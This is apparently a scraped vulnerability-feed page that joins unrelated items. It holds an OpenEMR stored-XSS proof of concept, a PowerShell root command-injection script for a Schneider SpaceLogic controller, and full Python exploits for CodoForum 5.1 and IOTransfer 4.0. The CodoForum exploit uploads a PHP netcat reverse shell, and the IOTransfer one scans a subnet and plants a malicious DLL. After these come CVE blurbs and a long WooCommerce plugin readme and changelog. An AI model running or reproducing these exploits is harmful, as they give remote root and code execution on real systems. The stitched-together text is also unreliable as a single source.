Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.0.

**Description**

openemr / openemr is vulnerable to Cross-site Scripting (XSS) - Stored

**Proof of Concept**

    // Poc 
    <script>alert(document.cookie)</script>
    

steps to reproduce:

    1) login open emr patient portal https://demo.openemr.io/openemr/portal/index.php
    
    2) goto my profile in https://demo.openemr.io/openemr/portal/home.php
    
    ​3)click on pending review.
    
    4)add the payload in the first name /middle name  (<script>alert(document.cookie)</script>)
    
    5) click  submit changes
    
    6) after that we get an with Error: Patient was successfully updated
    
    7) on clicking  pending review  the xss wil be triggered
    

**Impact**

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

CVE-2022-2494: Cross-site Scripting (XSS) - Stored in openemr

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) versions 1.31.460 and below suffer from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user via the name GET parameter in delsnap.pl Perl/CGI script which is used for deleting snapshots taken from the webcam.

    <#SpaceLogic.ps1Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root ExploitVendor: Schneider Electric SEProduct web page: https://www.se.com                  https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/                  https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmwareAffected version: SpaceLogic C-Bus Home Controller (5200WHC2)                  formerly known as C-Bus Wiser Home Controller MK2                  V1.31.460 and prior                  Firmware: 604Summary: SpaceLogic C-Bus Home Automation SystemLighting control and automation solutions forbuildings of the future, part of SpaceLogic.SpaceLogic C-Bus is a powerful, fully integratedsystem that can control and automate lightingand many other electrical systems and products.The SpaceLogic C-Bus system is robust, flexible,scalable and has proven solutions for buildingsof the future. Implemented for commercial andresidential buildings automation, it bringscontrol, comfort, efficiency and ease of useto its occupants.Wiser Home Control makes technologies in yourhome easy by providing seamless control of music,home theatre, lighting, air conditioning, sprinklersystems, curtains and shutters, security systems...you name it. Usable anytime, anywhere even whenyou are away, via preset shortcuts or directcontrol, in the same look and feel from a wallswitch, a home computer, or even your smartphoneor TV - there is no wiser way to enjoy 24/7connectivity, comfort and convenience, entertainmentand peace of mind homewide! The Wiser 2 Home Controller allows you to accessyour C-Bus using a graphical user interface, sometimesreferred to as the Wiser 2 UI. The Wiser 2 HomeController arrives with a sample project loadedand the user interface accessible from your localhome network. With certain options set, you canalso access the Wiser 2 UI from anywhere usingthe Internet. Using the Wiser 2 Home Controlleryou can: control equipment such as IP cameras,C-Bus devices and non C-Bus wired and wirelessequipment on the home LAN, schedule events inthe home, create and store scenes on-board, customisea C-Bus system using the on-board Logic Engine,monitor the home environment including C-Bus andsecurity systems, control ZigBee products suchas Ulti-ZigBee Dimmer, Relay, Groups and Curtains.Examples of equipment you might access with Wiser2 Home Controller include lighting, HVAC, curtains,cameras, sprinkler systems, power monitoring, Ulti-ZigBee,multi-room audio and security controls.Desc: The home automation solution suffers froman authenticated OS command injection vulnerability.This can be exploited to inject and execute arbitraryshell commands as the root user via the 'name' GETparameter in 'delsnap.pl' Perl/CGI script which isused for deleting snapshots taken from the webcam.=========================================================/www/delsnap.pl:----------------01: #!/usr/bin/perl02: use IO::Handle;03:04:05: select(STDERR);06: $| = 1;07: select(STDOUT);08: $| = 1;09:10: #print "\r\n\r\n";11:12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';13: use CGI;14:15: my $PROGNAME = "delsnap.pl";16:17: my $cgi = new CGI();18:19: my $name = $cgi->param('name');20: if ($name eq "list") {21:     print "\r\n\r\n";22:     print "DATA=";23:     print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;24:     exit(0);25: }26: if ($name eq "deleteall") {27:     print "\r\n\r\n";28:     print "DELETINGALL=TRUE&";29:     print `rm /mnt/microsd/clipsal/ugen/imgs/*`;30:     print "COMPLETED=true\n";31:     exit(0);32: }33: #print "name $name\n";34: print "\r\n\r\n";35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";36:37: unlink $filename or die "COMPLETED=false\n";38:39: print "COMPLETED=true\n";=========================================================Tested on: Machine: OMAP3 Wiser2 Board           CPU: ARMv7 revision 2           GNU/Linux 2.6.37 (armv7l)           BusyBox v1.22.1           thttpd/2.25b           Perl v5.20.0           Clipsal 81           Angstrom 2009.X-stable           PICED 4.14.0.100           lighttpd/1.7           GCC 4.4.3           NodeJS v10.15.3Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5710Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.phpVendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdfCVE ID: CVE-2022-34753CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3475327.03.2022#>$host.UI.RawUI.ForegroundColor = "Green"if ($($args.Count) -ne 2)  {    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")} else {    $ip = $args[0]    $cmd = $args[1]    $cmdinj = "/delsnap.pl?name=|$cmd"    Write-Host("`nSending command '$cmd' to $ip`n")    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj    curl -v $ip$cmdinj}<#PoCPS C:\> .\SpaceLogic.ps1Usage: .\SpaceLogic.ps1 [IP] [CMD]PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"Sending command 'uname -a;id;pwd' to 192.168.1.2VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payloadVERBOSE: received 129-byte response of content type text/html; charset=utf-8StatusCode        : 200StatusDescription : OKContent           : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux                    uid=0(root) gid=0(root)                    /custom-package                    RawContent        : HTTP/1.1 200 OK                    Access-Control-Allow-Origin: *                    Connection: keep-alive                    Content-Length: 129                    Content-Type: text/html; charset=utf-8                    Date: Thu, 30 Jun 2022 14:48:43 GMT                    ETag: W/"81-LTIWJvYlDBYAlgXEy...Forms             : {}Headers           : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;                     charset=utf-8]...}Images            : {}InputFields       : {}Links             : {}ParsedHtml        : mshtml.HTMLDocumentClassRawContentLength  : 129PS C:\>#>

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root

CodoForum version 5.1 suffers from a remote code execution vulnerability.

    # Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)# Date: 06/07/2022# Exploit Author: Krish Pandey (@vikaran101)# Vendor Homepage: https://codoforum.com/# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip# Version: CodoForum v5.1# Tested on: Ubuntu 20.04# CVE: CVE-2022-31854#!/usr/bin/python3import requestsimport timeimport optparseimport randomimport stringbanner = """  ______     _______     ____   ___ ____  ____      _____ _  ___ ____  _  _    / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ // |( _ ) ___|| || |  | |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ | |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__   _| \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/|_|\___/____/   |_|  """print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")print(banner)print("\nExploit found and written by: @vikaran101\n")parser = optparse.OptionParser()parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')parser.add_option('-u', '--username', action="store", dest='username', help='admin username')parser.add_option('-p', '--password', action="store", dest='password', help='admin password')parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')options, args = parser.parse_args()proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}if not options.target or not options.username or not options.password or not options.ip or not options.port:    print("[-] Missing arguments!")    print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")    print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")    exit()loginURL = options.target + '/admin/?page=login'globalSettings = options.target + '/admin/index.php?page=config'payloadURL = options.target + '/sites/default/assets/img/attachments/'session = requests.Session()randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))def getPHPSESSID():        try:        get_PHPID = session.get(loginURL)        headerDict = get_PHPID.headers        cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]        return cookies    except:        exit()phpID = getPHPSESSID()def login():    send_cookies = {'cf':'0'}    send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}    send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"    auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)    if "CODOFORUM | Dashboard" in auth.text:        print("[+] Login successful")def uploadAndExploit():    send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}    send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}    send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'    exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)    print("[*] Checking webshell status and executing...")    payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)    if payloadExec.status_code == 200:        print("[+] Payload uploaded successfully and executed, check listener")    else:        print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")login()uploadAndExploit()

CodoForum 5.1 Remote Code Execution

IOTransfer version 4.0 suffers from a remote code execution vulnerability.

    # Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)# Date: 06/22/2022# Exploit Author: Tomer Peled# Vendor Homepage: https://www.iobit.com# Software Link: https://iotransfer.itopvpn.com/# Version: V4 and onward# Tested on: Windows 10# CVE : 2022-24562# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562import osfrom urllib3.exceptions import ConnectTimeoutErrorfrom win32com.client import *import requestsimport jsonlocalPayloadPath = r"c:\temp\malicious.dll"remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'Range = "192.168.89"UpOrDown="Upload"IP = ""UserName = ""def get_version_number(file_path):    information_parser = Dispatch("Scripting.FileSystemObject")    version = information_parser.GetFileVersion(file_path)    return versiondef getTaskList(IP, taskid=""):    print("Getting task list...")    url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'    res = requests.get(url)    tasks = json.loads(res.content)    tasks = json.loads(tasks['content'])    for task in tasks['tasks']:        if taskid == task['taskid']:            print(f"Task ID found: {taskid}")def CreateUploadTask(IP):    SetSavePath(IP)    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"[*] TaskID: {taskid}")    return taskiddef CreateUploadDetailNode(IP, taskid, remotePath, size='100'):    url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'    file_info = {        'size': size,        'savefilename': remotePath,        'name': remotePath,        'fullpath': r'c:\windows\system32\calc.exe',        'md5': 'md5md5md5md5md5',        'filetype': '3',    }    res = requests.post(url, json=file_info)    js = json.loads(res.content)    print(f"[V] Create Detail returned: {js['code']}")def readFile(Path):    file = open(Path, "rb")    byte = file.read(1)    next = "Start"    while next != b'':        byte = byte + file.read(1023)        next = file.read(1)        if next != b'':            byte = byte + next    file.close()    return bytedef CallUpload(IP, taskid, localPayloadPath):    url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'    send_data = readFile(localPayloadPath)    try:        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200:            print("[V] Success payload uploaded!")        else:            print(f"CreateRemoteFile: {res.content}")    except:        print("[*] Reusing the task...")        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200 or "false" in js['error']:            print("[V] Success payload uploaded!")        else:            print(f"[X] CreateRemoteFile Failed: {res.content}")def SetSavePath(IP):    url = f'http://{IP}:7193/index.php?action=setiotconfig'    config = {        'tasksavepath': 'C:\\Program '    }    requests.post(url, json=config)def ExploitUpload(IP,payloadPath,rPath,taskid =None):    if not taskid:        taskid = CreateUploadTask(IP)        size = os.path.getsize(payloadPath)    CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))    CallUpload(IP, taskid, payloadPath)def CreateDownloadTask(IP, Path) -> str:    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',        'filepath': Path    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"TaskID: {taskid}")    return taskiddef ExploitDownload(IP, DownloadPath, ID=None):    if ID:        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'    else:        taskid = CreateDownloadTask(IP, DownloadPath)        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'    res = requests.get(url)    return resdef ScanIP(startRange):    print("[*] Searching for vulnerable IPs", end='')    Current = 142    IP = f"{startRange}.{Current}"    VulnerableIP: str = ""    UserName: str = ""    while Current < 252:        print(".", end='')        url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'        try:            res = requests.get(url, timeout=1)            js = json.loads(res.content)            js2 = json.loads(js['content'])            UserName = js2['name']            VulnerableIP=IP            print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")            print(f"[!] Vulnerable PC username: {UserName}")            return VulnerableIP,UserName        except Exception as e:            pass        except ConnectTimeoutError:            pass        IP = f"{startRange}.{Current}"        Current = Current + 1    return None,Noneif __name__ == '__main__':    IP,UserName = ScanIP(Range)    if IP is None or UserName is None:        print("[X] No vulnerable IP found")        exit()    print("[*] Starting Exploit...")    if UpOrDown == "Upload":        print(f"[*]Local Payload Path: {localPayloadPath}")        print(f"[*]Remote Upload Path: {remotePayloadPath}")        ExploitUpload(IP,localPayloadPath,remotePayloadPath)    elif UpOrDown == "Download":        print(f"[*] Downloading the file: {remoteDownloadPath}")        res = ExploitDownload(IP, remoteDownloadPath)        file = open("out.pdf", "wb+")        file.write(res.content)        file.close()

IOTransfer 4.0 Remote Code Execution

Authenticated (custom plugin role) Arbitrary File Read via Export function vulnerability in GiveWP's GiveWP plugin <= 2.20.2 at WordPress.

CVE-2022-31475: GiveWP – Donation Plugin and Fundraising Platform

Broken Access Control vulnerability in YIKES Inc. Custom Product Tabs for WooCommerce plugin <= 1.7.7 at WordPress leading to &yikes-the-content-toggle option update.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

This plugin extends WooCommerce to allow shop owners to add custom tabs to products. The tabs are displayed on the individual product pages to the right of the default “Description” tab.

Individual product tabs are managed on the WooCommerce Edit Product screen and can be added on a per product basis. You can also create saved tabs and add them to multiple products as needed. Tabs can be easily added, deleted and rearranged.

Tab content areas use the standard WordPress text editor and may contain text, images, HTML or shortcodes.

If you experience any problems, please submit a ticket on our Free WordPress Support Forums and we’ll look in to it as soon as possible.

This plugin is compatible with WPML.

Upgrade to Custom Product Tabs Pro for great enhanced features!

1.  Download the plugin .zip file and make note of where on your computer you downloaded it to.
2.  In the WordPress admin (yourdomain.com/wp-admin) go to Plugins > Add New or click the “Add New” button on the main plugins screen.
3.  On the following screen, click the “Upload Plugin” button.
4.  Browse your computer to where you downloaded the plugin .zip file, select it and click the “Install Now” button.
5.  After the plugin has successfully installed, click “Activate Plugin” and enjoy!
6.  Edit a product, then click on ‘Custom Tab’ within the ‘Product Data’ panel
7.  Create saved, reusable tabs under Settings > Custom Product Tabs for WooCommerce

**All documentation can be found in our Knowledge Base.**

**Where do I go to add tabs to a product?**

When editing a product in WooCommerce, you will find “Custom Tabs” in the bottom left corner of the Product Data box. Click on “Custom Tabs” to reveal the custom tab manager.

**Where will these tabs appear?**

When the product is viewed on your website you will see the tabs you created to the right of the default “Description” tab.

**How do I change the order of the tabs?**

To change the order of custom tabs use the up and down “Move tab order” arrows.

**How do saved tabs work?**

Saved tabs are tabs you can create and then add to as many products you would like. If you update a saved tab, the changes will be updated for all products using that tab.

**How do I create saved tabs?**

To create a saved tab, click on the ‘Custom Product Tabs’ item on the WordPress dashboard menu and click the “Add Tab” button.

**How do I add a saved tab to a product?**

To add a saved tab to a product, go to the custom tabs section on the edit product screen, click the ‘Add a Saved Tab’ button above the tab, and choose which tab you would like to add.

**What does overriding a saved tab do?**

When using a saved tab on a product, a checkbox appears with the message ‘Override Saved Tab’ If you click that checkbox, edit the tab and save, the tab will be changed for that product only. Any edits to that saved tab under ‘Custom Product Tabs’ will not be applied to that product.

**Why does the WYSIWYG editor default to the ‘Visual’ tab?**

This was added in version 1.5 to support the dynamic adding and removing of the wp\_editor/WYSIWYG editor. Without this setting, the WYSIWYG editor does not load the correct toolbar and the editor can potentially break.

**Does custom tab data get exported with standard WooCommerce product data?**

Yes! Since v1.4 we’ve added the necessary code to ensure the custom tab data is exported with all of the other standard WooCommerce data. This ensures a smooth transition of products between sites.

Thank you for creating this useful plugin.

Hey Guys, I really respect that you think about the others. <3 <3 <3

Doesn't display new tabs, even with the apply\_filters checked. Useless for me.

I just added this plugin to a site and so far it works great. Thanks to the author!

Thank you very much for such helpful and very simple tabs for the woocommerce.

Every time there is an update something stops working.

Read all 145 reviews

“Custom Product Tabs for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

**1.7.9 – June 21st, 2022**

*   Address minor vulnerability
*   Fix issue related to Divi Builder

**1.7.7 – March 8th, 2021**

*   Housekeeping

**1.7.6 – October 19th, 2020**

*   WooCommerce 4.6 tested.

**1.7.5 – September 18th, 2020**

*   Swapping (deprecated) wp\_make\_content\_images\_responsive for wp\_filter\_content\_tags in our content filter. Thanks @stephencd!

**1.7.4 – September 12th, 2020**

*   WooCommerce 4.5.

**1.7.3 – August 19th, 2020**

*   WooCommerce 4.4.
*   Fixes issues related to WordPress 5.5.

**1.7.1 – March 13th, 2020**

*   Fixes a bug with product display in certain conditions.

**1.7.0 – March 10th, 2020**

*   Toggle the content filter on or off setting added. Use this to help with compatibility.
*   Support WooCommerce 4.0.
*   Support WordPress 5.4.

**1.6.13 – January 22nd, 2020**

*   Support WooCommerce 3.9.

**1.6.12 – November 20th, 2019**

*   Support WooCommerce 3.8.

**1.6.11 – September 25th, 2019**

*   Adding additional checks to post global before enqueueing assets.

**1.6.10 – April 19th, 2019**

*   Updating WC compatibility.
*   Fixing JS issue with WP backwards compatibility for versions < 4.7.

**1.6.9 – January 18th, 2019**

*   Fixing an issue where the visual editor shows a small portion of the content on product edit pages.

**1.6.8 – January 2nd, 2019**

*   Fixing some HTML markup.
*   Applying PHPCS fixes.

**1.6.7 – December 18th, 2018**

*   Adding filter to help allow importing of custom tabs.
*   Changing our export filters so custom tabs work with WooCommerce’s native meta export/import features.
*   The default capability for all admin pages is now publish_products.

**1.6.6 – October 26th, 2018**

*   Bumping WooCo Compatibility.
*   Changed wp_send_json_failure() to wp_send_json_error().

**1.6.5 – October 3rd, 2018**

*   Bumping WooCo Compatibility.

**1.6.4 – January 9th, 2018**

*   Happy new year!
*   The editor is now vertically resizeable.
*   The default capability for interacting with saved tabs is now Publish Products (publish\_products)

**1.6.3 – November 1st, 2017**

*   Declaring compatibility with WooCommerce and WordPress

**1.6.2 – October 13th, 2017**

*   Fixed a PHP Fatal Error that was occurring for users with PHP versions < 5.5.
*   Updated some of our documentation and language

**1.6.1 – October 12th, 2017**

*   Fixed an issue with handling foreign characters. Foreign character tab titles should be working properly now. Sorry about that everyone!
*   Added support for native WooCommerce exporting. You can now export and import your tabs with just WooCommerce!
*   Fixed some styling issues
*   Added a new “Support” page
*   Added a new “Go Pro” page – check out Custom Product Tabs Pro

**1.6.0 – October 9th, 2017**

*   Complete re-organization of all plugin files and removal of legacy code
*   Added a “name” field for saved tabs. This field is used only on the admin as a way of identifying tabs.
*   Tab “slugs” are now created via the WP Core sanitize_title() function. This should allow meaningful tab slugs when foreign characters are used in a title.
*   Re-added the “Add Media” button to the editor when it’s first initialized. This had disappeared when WP4.8 was released.
*   Fixed some issues with loading saved tab content into the editor. This should fix the issue that some users were experiencing where adding a saved tab would only work the second time.
*   Setting the width of the editor to 100%.
*   Custom Product Tabs is now a top-level menu item instead of a sub-menu item.
*   Cleaning up the saved tab’s array so we don’t leave orphaned data (e.g. added a hook so we delete a product’s tabs when the product is deleted)
*   Added a data update script to update all existing tab slugs to use sanitize_title() function.
*   Generated new POT file.
*   Added support and hooks for our new Custom Product Tabs Pro plugin!

**1.5.17 – August 23rd, 2017**

*   Cleaning up some PHP Notices being thrown – thanks to @ZombiEquinox on GitHub for reporting this
*   Updating readme compatibility values

**1.5.16 – August 1st, 2017**

*   Adding a proper deactivation hook. The plugin will leave no trace.

**1.5.15 – June 8th, 2017**

*   WordPress 4.8 support – using the new JavaScript Editor API functions to instantiate the editor and removed requiring WordPress’ wpembed plugin

**1.5.14 – May 8th, 2017**

*   Updating some CSS for the admin tabs table – the table should now render correctly regardless of “Visual” or “Text” tab and the saved tabs list should include a scrollbar if necessary

**1.5.13 – April 17th, 2017**

*   Updating a WooCommerce action – now using the proper one instead of a deprecated one

**1.5.12 – April 10th, 2017**

*   Adding some CSS to allow the editor’s text mode to function properly

**1.5.11 – April 6th, 2017**

*   Checking for the existence of the get_id() method before using it.

**1.5.10 – April 5th, 2017**

*   Duplicating a product now duplicates custom product tabs and saved tabs correctly

**1.5.9 – April 4th, 2017**

*   Tested and updated the plugin for WooCommerce v3.0.0

**1.5.8 – March 17th, 2017**

*   Replaced the saved tab’s ID w/ an “Add New” button on the single saved tab page – it should be easier to add saved tabs in bulk now
*   Added a filter for all of the custom tab content – it should allow you to apply custom logic such as permissions in one central location
*   Changed the way saved tabs are applied on the edit product page – it should allow embed content (especially Google Maps Embed content) to function correctly in all instances.

**1.5.7 – February 27th, 2017**

*   Duplicating a product now duplicates the corresponding saved tabs correctly
*   Added two filters (yikes_woo_use_the_content_filter and yikes_woo_filter_main_tab_content) to help provide a work-around to using the standard the_content filter which has caused numerous issues due to plugin conflicts.

**1.5.6 – February 16th, 2017**

*   Fixed an issue where the “Add a Saved Tab” modal was displaying YouTube videos if a saved tab had a YouTube URL in its content

**1.5.5 – January 23rd, 2017**

*   Re-did 1.5.4 changes – checking for function existence before using it

**1.5.4 – January 23rd, 2017**

*   Re-did 1.5.3 changes – the_content filter is reapplied and the specific Site Builder plugin’s filters are

**1.5.3 – January 23rd, 2017**

*   Replaced the use of the_content filter with the filter’s associated functions (e.g. wptexturize, wpautop)

**1.5.2 – December 23rd, 2016**

*   The editor should only default to the ‘Visual’ tab for our Custom Product Tabs (no other editors)
*   Added all of the default WordPress settings to the editor

**1.5.1 – December 22nd, 2016**

*   Fixed bug that caused content to be copied incorrectly when moving tabs up / down
*   Only on the product page will the editor default to ‘Visual’ (instead of every page)

**1.5 – December 20th, 2016**

*   Version 1.5 includes a brand new feature – saved tabs – as well as a number of bug fixes, style tweaks, code clean-up, and comments
*   UI: Complete overhaul of the custom tab interface for an easier, responsive tab creating experience.
*   Saved Tabs: A new settings page has been added for users to create / update / delete saved tabs (see FAQ for more information)
*   Saved Tabs: On the product edit page, a new button (‘Add a Saved Tab’) has been added that allows you to choose one of your saved tabs and add it to the current product
*   Adding a new tab initializes a new wp\_editor (WYSIWYG) instead of a plain textarea
*   Added warning message when two tabs have the same title
*   Tabs with empty titles are no longer shown on the product page
*   Added ability to remove the first tab
*   Adding, moving, and removing tabs works as expected when the user’s ‘Visual Editor’ option is checked
*   On the product & settings pages, WYSIWYG editors will default to the visual tab (this helps prevent errors with dynamic wp\_editor generation)
*   Added a filter yikes_woocommerce_default_editor_mode that can change the default-to-visual-tab behavior (use at your own risk!)
*   Updated the ‘How To’ text, and slight modification to the style
*   Changed the JavaScript methods controlling how tabs were added, deleted, and moved up/down
*   Cleaned up and commented on all PHP and JavaScript files
*   Added proper i18n, with languages/ folder, .pot file, and load_plugin_textdomain hook
*   Incremented version #

**1.4.4 – March 1st, 2016**

*   Re-named the tab ID’s to support URL’s with query args (eg: http://www.example.com/shop#tab-reviews)

**1.4.3 – February 18th, 2016**

*   Wrapped missing ‘Custom Tab Title’ in localization/translation functions. (Plugin is now 100% translatable)
*   Removed i18n class files, and old .po/.mo files (less bloat)

**1.4.2 – February 17th, 2016**

*   Updated the internationalization strings ( yikes-inc-woocommerce-custom-product-tabs to yikes-inc-easy-custom-woocommerce-product-tabs )

**1.4.1 – August 20th, 2015**

*   Fixed conflict with other CSV export plugins for WooCommerce
*   Now custom product tab and row data/headers only get exported via ‘Tools > Export > Products’

**1.4 – July 29th, 2015**

*   Enhancement: Added the ‘Custom Product Tabs for WooCommerce ‘ data to the standard WooCommerce export file, so custom tab data can be transferred between sites smoothly.

**1.3 – July 21st, 2015**

*   Enhancement: Enabled WYSIWYG editor on tab content containers (enables shortcode and content to pass through the\_content() filter)
*   Updated repo screenshots and descriptions

**1.2 – March 18th, 2015**

*   Enhancement: Fixed issue where non utf8 characters in tab titles caused front end not to generate the tabs
*   Enhancement: When user doesn’t have WooCommerce installed, they are now redirected to the plugin install search page, with WooCommerce at the top.

**1.1**

*   Added class to the Woo tabs content title, for targeting via CSS ( .yikes-custom-woo-tab-title )

**1.0.0**

*   Initial Release

CVE-2022-28666: Custom Product Tabs for WooCommerce

Cross-Site Request Forgery (CSRF) vulnerability in JoomUnited WP Meta SEO plugin <= 4.4.8 at WordPress allows an attacker to update the social settings.

CVE-2022-30337: WP Meta SEO

Unauthenticated SQL injection bugs put thousands of WordPress sites under threat

